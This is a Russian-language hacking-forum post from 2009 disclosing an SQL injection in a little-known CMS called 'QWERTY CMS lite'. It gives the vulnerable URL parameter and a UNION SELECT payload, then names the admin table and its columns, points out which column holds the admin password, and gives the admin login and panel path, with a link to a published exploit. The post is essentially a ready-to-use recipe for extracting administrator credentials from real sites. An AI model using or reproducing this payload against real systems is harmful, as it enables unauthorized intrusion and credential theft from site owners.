18.02.2009, 22:37
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами:
11278406
Репутация:
818
|
|
QWERTY CMS lite - SQL INJ
Нашел уязвимость SQL INJ в одной малоизвестной QWERTY CMS lite. В гугле даже несмог найти авторов сего творения.
Уязвимость в файле index.php, уязвимый параметр id:
index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
Таблица администратора: rkh8t5po
клонки:
secret873ktlW
pass459khyf
Пароль от админки находится в колонке pass459khyf Логин: admin
Путь к Админке:
/admin/
http://www.milw0rm.com/exploits/8104
Последний раз редактировалось b3; 25.02.2009 в 23:55..
|
|
|